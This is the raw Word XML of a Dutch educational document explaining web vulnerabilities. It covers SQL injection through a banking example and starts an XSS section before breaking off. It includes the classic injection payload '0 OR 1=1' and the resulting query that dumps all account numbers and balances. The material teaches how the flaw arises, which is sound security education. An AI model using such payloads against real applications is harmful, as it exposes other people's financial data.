                              <w:t xml:space="preserve"> kan de applicatie met de database communiceren. Hiermee wordt er data opgevraagd, gewijzigd of verwijderd.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3EB0B" id="Tekstvak 2" o:spid="_x0000_s1042" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:18pt;margin-top:184.6pt;width:152pt;height:75.3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BqXUyQCAAAkBAAADgAAAGRycy9lMm9Eb2MueG1srFPbbtswDH0fsH8Q9L7YSZ2uMeIUXboMA7oL&#10;0O4DZFmOhUiiJimxs68fJSdZ0L0N84MgmtQheXi4vB+0IgfhvART0ekkp0QYDo0024r+eNm8u6PE&#10;B2YapsCIih6Fp/ert2+WvS3FDDpQjXAEQYwve1vRLgRbZpnnndDMT8AKg84WnGYBTbfNGsd6RNcq&#10;m+X5bdaDa6wDLrzHv4+jk64SftsKHr61rReBqIpibSGdLp11PLPVkpVbx2wn+akM9g9VaCYNJr1A&#10;PbLAyN7Jv6C05A48tGHCQWfQtpKL1AN2M81fdfPcMStSL0iOtxea/P+D5V8P3x2RTUWLYkGJYRqH&#10;9CJ2PhzYjswiP731JYY9WwwMwwcYcM6pV2+fgO88MbDumNmKB+eg7wRrsL5pfJldPR1xfASp+y/Q&#10;YBq2D5CAhtbpSB7SQRAd53S8zEYMgfCYcnGTFzm6OPoW89ubaRpexsrza+t8+CRAk3ipqMPZJ3R2&#10;ePIhVsPKc0hM5kHJZiOVSobb1mvlyIGhTjbpSw28ClOG9DH7bJ6QDcT3SUJaBtSxkrqid3n8RmVF&#10;Nj6aJoUEJtV4x0qUOdETGRm5CUM9pEkszqzX0ByRLwejbHHN8NKB+0VJj5KtqP+5Z05Qoj4b5Hwx&#10;LYqo8WQU8/czNNy1p772MMMRqqKBkvG6DmkvIh0GHnA2rUy0xSGOlZxKRikmNk9rE7V+baeoP8u9&#10;+g0AAP//AwBQSwMEFAAGAAgAAAAhAObiOEjfAAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj81O&#10;w0AMhO9IvMPKSFwQ3fQvbUI2FSCBuLb0AZzETSKy3ii7bdK3xz3BybJnNP4m2022UxcafOvYwHwW&#10;gSIuXdVybeD4/fG8BeUDcoWdYzJwJQ+7/P4uw7RyI+/pcgi1khD2KRpoQuhTrX3ZkEU/cz2xaCc3&#10;WAyyDrWuBhwl3HZ6EUWxttiyfGiwp/eGyp/D2Ro4fY1P62QsPsNxs1/Fb9huCnc15vFhen0BFWgK&#10;f2a44Qs65MJUuDNXXnUGlrFUCbeZLECJYbmK5FIYWM+TLeg80/8r5L8AAAD//wMAUEsBAi0AFAAG&#10;AAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQ&#10;SwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQ&#10;SwECLQAUAAYACAAAACEA7BqXUyQCAAAkBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAUAAYACAAAACEA5uI4SN8AAAAKAQAADwAAAAAAAAAAAAAAAAB8BAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAIgFAAAAAA==&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C10F22F" w14:textId="39719AA2" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00271A19">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Met </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>SQL taal</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> kan de applicatie met de database communiceren. Hiermee wordt er data opgevraagd, gewijzigd of verwijderd.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00765361">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08B93921" wp14:editId="42C749F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2401359</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2329392</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2912110" cy="965200"/>
                <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="45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2110" cy="965200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0ADFBF2C" w14:textId="2ABF1F9D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00271A19">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">SQL Injectie gebeurt wanneer de applicatie faalt om de ingevoerde data, via het formulier, schoon te maken van de SQL Query. Een aanvaller kan special opgebouwde </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>SQL commando’s</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> gebruiken die de database op verzoek van de applicatie laat uitvoeren.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93921" id="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:189.1pt;margin-top:183.4pt;width:229.3pt;height:76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iwjiUCAAAlBAAADgAAAGRycy9lMm9Eb2MueG1srFPBbtswDL0P2D8Iui+OjaRrjDpFly7DgK4b&#10;0O4DaFmOhUiiJymxs68fpaRptt2G6SCQIvlIPlI3t6PRbC+dV2grnk+mnEkrsFF2U/Hvz+t315z5&#10;ALYBjVZW/CA9v12+fXMz9KUssEPdSMcIxPpy6CvehdCXWeZFJw34CfbSkrFFZyCQ6jZZ42AgdKOz&#10;Yjq9ygZ0Te9QSO/p9f5o5MuE37ZShK9t62VguuJUW0i3S3cd72x5A+XGQd8pcSoD/qEKA8pS0jPU&#10;PQRgO6f+gjJKOPTYholAk2HbKiFTD9RNPv2jm6cOepl6IXJ8f6bJ/z9Y8bj/5phqKj6b55xZMDSk&#10;Z7n1YQ9bVkR+ht6X5PbUk2MYP+BIc069+v4BxdYzi6sO7EbeOYdDJ6Gh+vIYmV2EHnF8BKmHL9hQ&#10;GtgFTEBj60wkj+hghE5zOpxnI8fABD0Wi7zIczIJsi2u5jT8lALKl+je+fBJomFRqLij2Sd02D/4&#10;EKuB8sUlJvOoVbNWWifFbeqVdmwPtCfrdE7ov7lpywbKPi/mCdlijE8rZFSgPdbKVPx6Gk8MhzKy&#10;8dE2SQ6g9FGmSrQ90RMZOXITxnpMk6AuKSByV2NzIMIcHveW/hkJHbqfnA20sxX3P3bgJGf6syXS&#10;F/lsFpc8KbP5+4IUd2mpLy1gBUFVPHB2FFchfYxYt8U7Gk6rEm+vlZxqpl1MdJ7+TVz2Sz15vf7u&#10;5S8AAAD//wMAUEsDBBQABgAIAAAAIQDErdz/3gAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/B&#10;TsMwEETvSPyDtUhcEHXa0sSEOBUggbi29AM2sZtExOsodpv079me4DajfZqdKbaz68XZjqHzpGG5&#10;SEBYqr3pqNFw+P54VCBCRDLYe7IaLjbAtry9KTA3fqKdPe9jIziEQo4a2hiHXMpQt9ZhWPjBEt+O&#10;fnQY2Y6NNCNOHO56uUqSVDrsiD+0ONj31tY/+5PTcPyaHjbPU/UZD9nuKX3DLqv8Rev7u/n1BUS0&#10;c/yD4Vqfq0PJnSp/IhNEr2GdqRWjLNKUNzCh1ldRadgslQJZFvL/hvIXAAD//wMAUEsBAi0AFAAG&#10;AAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQ&#10;SwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQ&#10;SwECLQAUAAYACAAAACEAvQiwjiUCAAAlBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAUAAYACAAAACEAxK3c/94AAAALAQAADwAAAAAAAAAAAAAAAAB9BAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAIgFAAAAAA==&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0ADFBF2C" w14:textId="2ABF1F9D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00271A19">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">SQL Injectie gebeurt wanneer de applicatie faalt om de ingevoerde data, via het formulier, schoon te maken van de SQL Query. Een aanvaller kan special opgebouwde </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>SQL commando’s</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> gebruiken die de database op verzoek van de applicatie laat uitvoeren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AF9D32" w14:textId="6D2D5095" w:rsidR="00860401" w:rsidRDefault="00860401" w:rsidP="00860401"/>
    <w:p w14:paraId="32C7AC1C" w14:textId="140A267E" w:rsidR="00190EAF" w:rsidRPr="00811D86" w:rsidRDefault="00190EAF" w:rsidP="00860401"/>
    <w:p w14:paraId="0E3F7928" w14:textId="5C8755BA" w:rsidR="003641BC" w:rsidRDefault="00C1656A">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="007F6D2C">
        <w:t xml:space="preserve">oorbeelden </w:t>
      </w:r>
      <w:r w:rsidR="009F70F3">
        <w:t>van een</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve"> SQL Injectie</w:t>
      </w:r>
      <w:r w:rsidR="00F87F60">
        <w:t xml:space="preserve"> in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D73045E" w14:textId="5D395F96" w:rsidR="00DD5376" w:rsidRDefault="00DD5376">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Voor het uitvoeren van een</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve"> SQL Injectie </w:t>
      </w:r>
      <w:r>
        <w:t>moet de database en applicatie aan twee</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F322B">
        <w:t>criteria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voldoen</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve">, een relationele database dat SQL gebruikt, en een applicatie waar de eindgebruiker de controle heeft over de input die mee wordt gegeven aan een </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>SQL-query</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BD5B31">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C94F34" w14:textId="236EBD86" w:rsidR="00BD5B31" w:rsidRDefault="00BD5B31">
      <w:r>
        <w:t xml:space="preserve">Ik zal in </w:t>
      </w:r>
      <w:r w:rsidR="001D74DC">
        <w:t>een case</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F5CBF">
        <w:t xml:space="preserve">laten zien hoe een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003F5CBF">
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003F5CBF">
        <w:t xml:space="preserve"> kwetsbaarheid tot stand komt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14603520" w14:textId="07B32C46" w:rsidR="00A50252" w:rsidRPr="000E3B41" w:rsidRDefault="007C2F05">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Meer data </w:t>
      </w:r>
      <w:r w:rsidR="006A33B8" w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>teruggeven</w:t>
      </w:r>
      <w:r w:rsidRPr="000E3B41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan verwacht</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F7C95" w14:textId="790ED14E" w:rsidR="007C2F05" w:rsidRDefault="004267DD">
      <w:r>
        <w:t xml:space="preserve">In dit voorbeeld wilt de ontwikkelaar </w:t>
      </w:r>
      <w:r w:rsidR="007B6646">
        <w:t>het accountnummer en balans tonen van de gebruiker die op dat moment is ingelogd. Om de gebruikersdata op te kunnen vragen wordt de gebruikers ID opgestuurd als argument.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA27423" w14:textId="77777777" w:rsidR="00BC3F6B" w:rsidRDefault="00271A20" w:rsidP="00BC3F6B">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50A29726" wp14:editId="652924AB">
            <wp:extent cx="5760720" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="457" name="Afbeelding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sqli-voorbeeld.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218055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22061660" w14:textId="4D2F16B1" w:rsidR="00BC3F6B" w:rsidRDefault="00BC3F6B" w:rsidP="00BC3F6B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D762C" w14:textId="0825746D" w:rsidR="00FC4851" w:rsidRDefault="00EC3047">
      <w:pPr>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Onder normale omstandigheden zou de eindgebruiker met het ID 487 ingelogd zijn en zijn eigen accountgegevens hebben opgevraagd met de </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3047">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:r w:rsidR="00FC4851" w:rsidRPr="00FC4851">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>https://onlinebankeren/balans?userId=487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431A8A28" w14:textId="34B7E839" w:rsidR="008F5B07" w:rsidRDefault="008F5B07">
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>SQL-query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> die uitgevoerd zou worden zal dan zijn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1F0DCC" w14:textId="77777777" w:rsidR="0039481D" w:rsidRDefault="0039481D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>accountNummer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>balans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>account_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>487</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487EC4E" w14:textId="60D3EF62" w:rsidR="006B1259" w:rsidRDefault="001D74DC">
      <w:r>
        <w:t xml:space="preserve">Deze </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>SQL-query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zal door de database </w:t>
      </w:r>
      <w:r w:rsidR="006B1259">
        <w:t xml:space="preserve">uitgevoerd worden en het </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>accountnummer</w:t>
      </w:r>
      <w:r w:rsidR="006B1259">
        <w:t xml:space="preserve"> en balans van eindgebruiker 487 zal op de website getoond worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF5C0E" w14:textId="01DE6CD6" w:rsidR="008B784D" w:rsidRPr="006B346C" w:rsidRDefault="008B784D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B346C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiteren van </w:t>
      </w:r>
      <w:r w:rsidR="00E04605">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>kwetsbaarheid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136FAF30" w14:textId="636ADABE" w:rsidR="00383DA8" w:rsidRDefault="00122280" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Het exploiteren van dit voorbeeld is niet moeilijk, de aanvaller/hacker hoeft alleen maar te weten dat de input van de eindgebruikers niet schoon wordt gemaakt (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sanitize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) van verkeerde data. </w:t>
      </w:r>
      <w:r w:rsidR="005969BB">
        <w:t xml:space="preserve">De globale variabele </w:t>
      </w:r>
      <w:r w:rsidR="005969BB" w:rsidRPr="005969BB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005969BB" w:rsidRPr="005969BB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005969BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC712F">
        <w:t xml:space="preserve">op regel 3 (figuur 3.3) wordt zonder voorzorgmaatregelingen er in geplaatst en uitgevoerd. </w:t>
      </w:r>
      <w:r w:rsidR="007553E2">
        <w:t xml:space="preserve">Dit betekent dat de aanvaller/hacker </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>SQL-injecties</w:t>
      </w:r>
      <w:r w:rsidR="007553E2">
        <w:t xml:space="preserve"> kan uitvoeren.</w:t>
      </w:r>
      <w:r w:rsidR="00C41D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00383DA8">
        <w:t xml:space="preserve">Een veelgebruikte </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>SQL-injectie</w:t>
      </w:r>
      <w:r w:rsidR="00383DA8">
        <w:t xml:space="preserve"> is: 0 OR 1=1, wat resulteert naar de</w:t>
      </w:r>
      <w:r w:rsidR="005D1BBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005D1BBF">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00383DA8">
        <w:t xml:space="preserve"> query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00383DA8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2B799" w14:textId="7ABC5417" w:rsidR="00E71C2C" w:rsidRDefault="00E71C2C" w:rsidP="00E71C2C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>accountNummer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>balans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>account_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0039481D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>0 OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA71C0" w14:textId="2F78A395" w:rsidR="005D1BBF" w:rsidRDefault="005D1BBF" w:rsidP="00E71C2C">
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve">Als deze </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9" w:rsidRPr="005D1BBF">
        <w:t>SQL-query</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve"> wordt uitgevoerd dan zal het alle </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9" w:rsidRPr="005D1BBF">
        <w:t>accountgegevens</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9" w:rsidRPr="005D1BBF">
        <w:t>teruggeven</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1BBF">
        <w:t xml:space="preserve"> die in de database opgeslagen staan. </w:t>
      </w:r>
      <w:r w:rsidR="00E54077">
        <w:t>De aanvaller/hacker heeft nu het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E54077">
        <w:t>accountnummer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="001A02F9">
        <w:t>balansgegevens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van alle gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FFA0CB" w14:textId="77777777" w:rsidR="005D1BBF" w:rsidRDefault="005D1BBF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E28FF" w14:textId="7673412A" w:rsidR="005D1BBF" w:rsidRPr="008C7B6A" w:rsidRDefault="006A7123" w:rsidP="00E71C2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A3 XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596C95C" w14:textId="2FECF57C" w:rsidR="00984C98" w:rsidRDefault="00623C5F" w:rsidP="00E71C2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251734016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5562219C" wp14:editId="571B8BA8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3079327</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1038014</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3124200" cy="960755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="453" name="Afbeelding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alert-functie.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3124200" cy="960755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="008779EF" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve">Cross-site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008779EF" w:rsidRPr="00DA2358">
        <w:t>scrip</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t>ting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DA2358">
        <w:t xml:space="preserve"> (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t xml:space="preserve"> is een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DA2358" w:rsidRPr="00DA2358">
        <w:t>client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
